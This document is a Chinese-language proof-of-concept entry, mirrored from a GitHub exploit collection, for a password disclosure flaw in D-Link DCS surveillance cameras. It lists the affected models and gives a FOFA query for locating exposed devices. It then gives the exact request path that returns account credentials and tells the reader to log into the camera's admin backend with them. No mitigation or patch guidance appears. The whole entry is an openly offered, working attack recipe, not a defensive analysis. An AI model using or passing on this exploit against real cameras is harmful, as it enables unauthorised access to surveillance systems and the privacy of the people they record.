admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/D-Link/D-LinkDCS监控系统getuser存在密码泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.1 KiB
Raw Blame History

D-Link DCS监控系统getuser存在密码泄露漏洞

一、漏洞简介

D-Link DCS是一款监控摄像机成像色彩为彩色 是一款网络摄像机该监控存在账号密码信息泄露漏洞恶意攻击者可通过访问特定的URL可以得到账号密码信息直接进入利用漏洞得到账户密码直接进入后台。

二、影响版本

  • DCS-2530L
  • DCS-2670L
  • DCS-4603
  • DCS-4622
  • DCS-4701E
  • DCS-4703E
  • DCS-4705E
  • DCS-4802E
  • DCS-P703

三、资产测绘

  • fofaapp="D_Link-DCS-4622"
  • 特征

1708141509981-1360206a-2ef6-4c37-a777-af8adb962b91.png

四、漏洞复现

/config/getuser?index=0

1708141554778-102e598d-4d56-43d1-baf4-6d1c6c1393cf.png

使用获取到的账号密码登录

1708141620644-665a2497-6af1-405f-b142-b2f83d7ef69c.png

更新: 2024-02-29 23:57:12
原文: https://www.yuque.com/xiaokp7/ocvun2/lv9ugvkave8utxf5